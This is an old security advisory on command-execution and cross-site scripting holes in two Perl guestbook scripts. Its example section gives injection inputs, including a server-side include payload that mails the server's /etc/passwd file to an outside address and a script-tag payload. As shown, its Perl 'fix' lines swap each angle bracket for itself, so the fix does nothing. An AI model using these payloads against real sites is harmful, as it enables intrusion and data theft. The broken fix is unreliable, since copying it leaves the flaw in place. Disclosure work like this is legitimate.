[ DownBload Security Research Lab Advisory ]
[-------------------------------------------------------------------------]
Advisory name: SSI & CSS execution in E-Guest (1.1) & ZAP Book (v1.0.3)
Advisory number: 6
Application: E-Guest (1.1) & ZAP Book (v1.0.3) (CGI scripts)
---[ E-Guest
Author: Leung Eric
E-mail: [EMAIL PROTECTED]
Homepage: http://leungeric.com
Working demo: http://leungeric.com/eric/demo/E-Guest_sign.pl
---[ ZAP Book
Author: Sephiroth32
E-mail: [EMAIL PROTECTED]
Homepage: http://www.unitedff.com
Date: 28.06.2002
Impact: remote user can execute shell commands & cross site scripting
Tested on: Debian 2.1 (2.0.36 kernel), Apache web server - version 1.3.4
Discovered by: DownBload
Mail me @: [EMAIL PROTECTED]
======[ Overview
--[ E-Guest is "...full feature guestbook written in Perl...".
Maybe little too much 'full feature' ;).
--[ ZAP Book is guestbook too, but it is more advanced than E-Guest.
======[ Problem
It looks that it is very hard to find secure guestbook. ;).
--[ E-Guest author wrote - "HTML tag filtering". That is true, but only
'comment' is filtered, and there is still name, email, homepage and
location, where we can put our nasty SSI or CSS code.
--[ ZAP Book is different animal. In ZAP Book, almost everything is
filtered. Exception is 'post' variable, which contains user comment,
so again, we can put our nasty SSI or CSS code in 'post' variable.
======[ Examples
---[ E-Guest
SSI attack
~~~~~~~~~~
Full Name: HI<!--#exec cmd="/bin/mail [EMAIL PROTECTED] < /etc/passwd"-
->
E-mail: [EMAIL PROTECTED]
Homepage:
UIN:
Location: Beyond the light
Comment: Nothing special, just SSI attack.
CSS attack
~~~~~~~~~~
Full Name: HI<script>javascript:alert('HACKED BY DOWNBLOAD');</script>
E-mail: [EMAIL PROTECTED]
Homepage:
UIN:
Location: Beyond the light
Comment: Nothing special, just CSS attack.
---[ ZAP Book
SSI attack
~~~~~~~~~~
Name: DownBload
Email: [EMAIL PROTECTED]
Homepage:
Location:
AIM Screename:
MSN Email:
Yahoo! Screename:
ICQ Number:
Referred by: Search Engine
Entry: SSI attack <!--#exec cmd="/bin/mail [EMAIL PROTECTED]
< /etc/passwd"-->
CSS attack
~~~~~~~~~~
Name: DownBload
Email: [EMAIL PROTECTED]
Homepage:
Location:
AIM Screename:
MSN Email:
Yahoo! Screename:
ICQ Number:
Referred by: Search Engine
Entry: CSS attack <script>javascript:alert('HACKED BY
DOWNBLOAD');</script>
======[ Solution
As i said in 'Makebook advisory', solution for SSI & CSS attack is
filtering
special characters from user input.
---[ E-Guest
FIX: Add next code to E-Guest_sign.pl (or wait for fixed version :-):
...
$fullname =~ s/</</g;
$fullname =~ s/>/>/g;
$email =~ s/</</g;
$email =~ s/>/>/g;
$homepage =~ s/</</g;
$homepage =~ s/>/>/g;
$uin =~ s/</</g;
$uin =~ s/>/>/g;
$location =~ s/</</g;
$location =~ s/>/>/g;
...
---[ ZAP Book
FIX: Add next code to addentry.cgi (or wait for fixed version :-):
...
$in{'post'} =~ s/</</g;
$in{'post'} =~ s/>/>/g;
...
======[ Greetz
Greetz goes to #hr.hackers <irc.carnet.hr>.
Special greetz goes to (rand()): St0rm, BoyScout, h4z4rd, fi, Sunnis,
Fr1c, harlequin, Astral and www.active-security.org.
Special shitz goes to: DarkMan from crohack a.k.a darkforum, and his
stupid friend h4x0r.
